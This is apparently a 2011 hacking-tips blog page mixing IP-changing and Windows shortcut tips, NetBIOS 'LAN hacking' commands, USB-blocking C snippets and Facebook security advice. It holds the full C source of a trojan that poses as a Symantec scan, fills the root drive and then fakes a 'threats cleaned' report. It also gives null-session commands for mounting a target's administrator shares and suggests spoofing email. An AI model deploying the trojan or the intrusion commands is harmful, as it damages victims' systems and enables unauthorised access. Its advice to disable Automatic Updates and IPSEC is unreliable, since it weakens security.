Blogger Widgets

About Ash Hacker

My photo
I am a social-techno-learner which believes in its own efficiency first and then implements with the suggestions of my strong and enthusiastic Team which helps me takes everything into its perfection level.

Thursday 1 December 2011

Change your IP in less than 30 seconds

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked :




  • Click on "Start" in the bottom left hand corner of screen.
  •  Click on "Run"
  • Type in "command" and hit ok.
  • You should now be at an MSDOS prompt screen.
  • Type "ipconfig /release" just like that, and hit "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"
NOTE : You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
  • Right click on "Local Area Connection" and click "properties" 
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Hit the "Ok" button here
  • Hit the "Ok" button again
NOTE : You should now be back to the "Local Area Connection" screen.
  • Right-click back on "Local Area Connection" and go to properties again. 
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Hit "Ok"
  • Hit "Ok" again
  • You now have a new IP address
NOTE : This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Wednesday 30 November 2011

Simple Commands for LAN Hacking for beginners

Posted: 29 Nov 2011 05:36 AM PST
I am sure many guys know all these commands.I am just gonna start on LAN Hacking so I am starting from basics.These commands are for beginners.These commands will run on CMD prompt.



 
  • First of all, open your Network Connection.
  • Now right click and select Properties. 
  • Then Select TCP/IP and click on Properties again. 
  • Click on Advanced and WINS tab. 
  • Here select Default for NeBIOS.
  • Now come back to the main window named Local Area Connection.
  • Now select File and Print Sharing for Microsoft Networks and hit enter.
NOTE : This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd”.

Codes

  • nslookup
  • net view
  • net use
  • net user
  • ping
  • tracert
  • arp
  • route
  • nbtstat
  • netstat
  • ipconfig
In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

1) Ping

  • This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command.
CODE :
NOTE : Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) Nslookup

  • This command is mostly for resolving DNS into IP.
Lets say you know the website URL but you don’t know its IP(and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

CODE :
  • nslookup (enter)
  • set type=mx (enter)
  • yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP.
  • Now why would you want to have an IP of a mail server?
  • To send spoofed mail to your friends or even for SE.
  • In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http://www.infowar.com/forums/showthread.p…p;threadid=2360

3) Tracert

This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.

CODE :

4) Arp

This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

CODE :

arp -a
  • Route 
This command will show you the routing table, gateway, interface and metric.

CODE :
  • route print

5) Ipconfig

This command will show tons of very helpful things.Your IP, gateway, dns in use.

CODE :
  • ipconfig
  • ipconfig /all
This command will give all that info but for all networks you might have it.Also, in case you have a dynamic IP and want to change it, then type.
  • ipconfig /release (this will release your IP)
  • ipconfig /renew (this will renew your iP)
NOTE : Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid.

6) Netstat

This command will show you connection to your box.

CODE :
  • netstat
  • netstat -a (this will show you all the listening ports and connection with DNS names)
  • netstat -n (this will show you all the open connection with IP addresses)
  • netstat -an (this will combined both of the above)

7) Nbtstat

This command will show you the netbios name of the target box.

CODE :
  • nbtstat -A x.x.x.x (x is the IP address)
  • nbtstat -a computername
  • net view x.x.x.x or computername (will list the available sharing folders on the target box)
  • net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target box as administrator)
  • Now if you want to connect to the target box and browse the entire C drive, then use this command: net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
NOTE : Keep in mind that this will only works if the target box doesn’t have an administrator password set.
And least but not last, the “help” command.
  • whatevercommand /help
  • whatevercommand /?
This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.

Tuesday 29 November 2011

Windows 7 Cheatsheet:::::::::::::::::::::::::::::::::::

As you all know Windows 7 RC3 is launched. Here’s a little cheat sheet I made up for some of the handy new hot key combination, many of which I’ve become quite dependent on!
From Desktop
Windows Key + Tab : Aero [press Tab to cycle between Windows]
Windows Key + E : Windows Explorer is launched.
Windows Key + R : Run Command is launched.
Windows Key + F : Search (which is there in previous Windows versions too)
Windows Key + X : Mobility Center
Windows Key + L : Lock Computer (It is there from the earlier versions as well)
Windows Key + U : Launches Ease of Access
Windows Key + P : Projector
Windows Key + T : Cycle Super Taskbar Items
Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]
Windows Key + M : Minimize All Windows
Windows Key + D : Show/Hide Desktop
Windows Key + Up : Maximize Current Window
Windows Key + Down : Restore Down / Minimize Current Windows
Windows Key + Left : Tile Current Window to the Left
Windows Key + Right : Tile Current Windows to the Right
[Continue pressing the Left and Right keys to rotate the window as well]
Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.
Windows Key + = : Launches the Magnifier
Windows Key + Plus : Zoom in
Windows Key + Minus : Zooms out
Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level
23. Alt + Left/ Right : Back/ Forward
24. Alt + P : Show/hide Preview Panel
 
Taskbar modifiers

25. Shift + Click on icon : Open a new instance
26. Middle click on icon : Open a new instance
27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges
28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.
29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group

Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh

15 Top Windows XP secrets:::::::

1. Useful key shortcuts available:

Windows key + D - shows the desktop.
Windows key + M - minimizes all open windows.
Windows key + Shift + M - maximizes all open windows.
Windows key + E - Runs Windows Explorer.
Windows key + R - shows the RUN dialog.
Windows key + F - shows Search window.
Windows key + Break - shows System Properties box.
Windows key + TAB - Go through taskbar applications.
Windows key + PAUSE Display the System Properties dialog box.
Windows key + U Open Utility Manager.
ALT + TAB - Cycle through opened applications.
Hold down CTRL while dragging an item to Copy it.
CTRL + ESC Display the Start menu.
ALT + ENTER View the properties for the selected item.
F4 key Display the Address bar list in My Computer or
NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder.
2. Lock Windows to protect computer :
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature.
3. Edit sysoc.inf to list all software :
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.
Note - use this at your own risk. Removing critical components of the system will make Windows instable.

4. Windows XP comes with IPv4 and IPv6 :
Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work.
5. Access Task Manager with shortcut :
To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.exe.
6. Stop treating ZIP files like Folders :
If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll.
7. Run program as diffrent user :
You can run a program as a different user. Right click an application and select Run As command.
8. Switch users leaving applications opened :
You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability).
Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname\username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running.
I recommend to open first a command-line prompt and type runas /? to see all the options available.
9. Rename multiple files in Windows at once :
Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them.
10.Task kill feature in Windows :
Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill <PID> to end the specific task. This forces an instant closing of the task.
11. Edit features with GPEDIT.MSC :
You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features.
12. Edit accounts in the command prompt :
You can edit accounts by running "control userpasswords2" at the command prompt.
13. Use systeminfo.exe to see System Information :
You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes.
14. Disable system services for maximum performance :
There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt.
This is a list of services that are *usually* useless and can be safely disabled.
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adaptor
NOTE: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again.
15. Repair Windows XP by using the XP installation CD:
If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run "attrib -H -R -S" on the C:\Boot.ini file and delete it. Run "Bootcfg /Rebuild" and then Fixboot.

To block USB devices via 'C' language make a program given below and run it.

To block USB devices via 'C' language make a program given below and run it.
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
To Unblock USB devices
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}


Trojen from c language

/* SPACE EATER TROJAN BY ASH-HACKER. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

Read more: http://hacking-tricks.webnode.com/news/how-to-make-trojan-using-c-language/
Create your own website for free:vv

Monday 28 November 2011

Secure ur facebook from Hacker

Facebook is the top social networking site in the world now, where most of us has at least an account (about 30% has more than one account) associated with it. Facebook is a great way to have fun using their fan pages or groups etc.It also has games and much more stuff but the question is how to secure Facebook as the ratio of Facebook hacking is increasing day by day.
Facebook has provided us a lot of ways to secure accounts but usually people don't give attention to it. If you have never touched any part of Facebook security, here I am gonna post five quick tips to get your Facebook secured.

1. Create a strong password for authentication

Passwords can be easily broken by brute-force technique,in which user use some software etc to crack your password, if you choose to use a short and simple password. If you don’t have a strong and alphanumeric password for your account, then whatever security guides that you apply below is not going to do any better,so first of all make your password strong.For this add symbols like these !@#$%^&* in your password and also add numbers in it. Your password must be a combination of lower case, upper case, numeric and special characters like symbols I have above mentioned.

2. Enable secure HTTPS connection

HTTP connection is totally outdated,its very easy to hack HTTP connection as it is extremely vulnerable to man in the middle attack. So to avoid this, Facebook offers the HTTPS connection which is a secured one and very difficult to hack.In HTTPS all the data you entered from your computer and sent to Facebook server is completely encrypted. Even if there is a man in the middle who taps your connection,he will get nothing.

3. Enable login notification with Mobile

If you enable the log in notification,it will send you message on your mobile whenever someone tries to log in from your account . So when you get this message that someone is using your Facebook account without your permission (means he hacked your account), you can immediately kick them out and call for a new password so that he can never login anymore. This feature is very good and you can enable notifications from both email and mobile SMS.
NOTE : I will recommend to use mobile notification ,so that you are warned immediately after the unknown access to your account.

4. One Time Password in login approval

One Time Password is a 2 factor authentication technique in which you enable all logins from unknown devices to use One Time Password.In this method whenever someone tries to log in to your account from unknown device a code comes to your mobile,without entering that code ,the hacker wont be able to access your account. In this way,you can easily ensure that only you can login from an unknown device.With the use of this method, there are only 2 ways for the hacker to use your Facebook identity. One is to get access to your recognized device which in most cases is your computer or smartphone. The other way is to get access to your mobile phone and then he will easily get the one time password.

5. Logging out from Facebook

Whenever most people are done with Facebook i.e checking and replying messages and notifications, they won't log out their Facebook account and just close the web browser and simply walk away from the computer,actually they assume that the session is logged out. This is a really big mistake as not all the web browsers works the same. Some still retain your previous session, in other words your cookies even though the web browser is closed. Always remember to log out after completing your tasks.

WEL-COME

You Are Welcome Heartly.......
Blogger Widgets